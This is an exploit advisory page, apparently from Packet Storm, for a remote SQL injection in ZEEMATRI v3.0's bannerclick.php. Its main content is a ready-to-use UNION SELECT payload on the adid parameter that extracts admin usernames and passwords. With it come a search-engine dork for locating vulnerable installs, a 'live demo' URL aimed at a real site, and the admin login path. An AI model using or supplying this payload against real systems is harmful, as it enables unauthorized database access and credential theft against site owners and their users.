ZEEMATRI version 3.0 suffers from a remote SQL injection vulnerability in bannerclick.php.
178f6d7dbcc30d0877d51f7158df43778391aef8f365b6b68db61b1e6d78994f|___________________________________________________|
|
| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: S.W.A.T.
|
| Home : wWw.SvvaT.IR
|
| email: svvateam[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script: http://zeeways.com/php-software/zeematri-v3.0.html
|
| Dork: "Powered by ZeeMatri"
|
|___________________________________________________|
Exploit:
________
www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
L!VE DEMO:
_________
http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
___________________
Admin LogiN :
www.[target].com/Script/admin/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed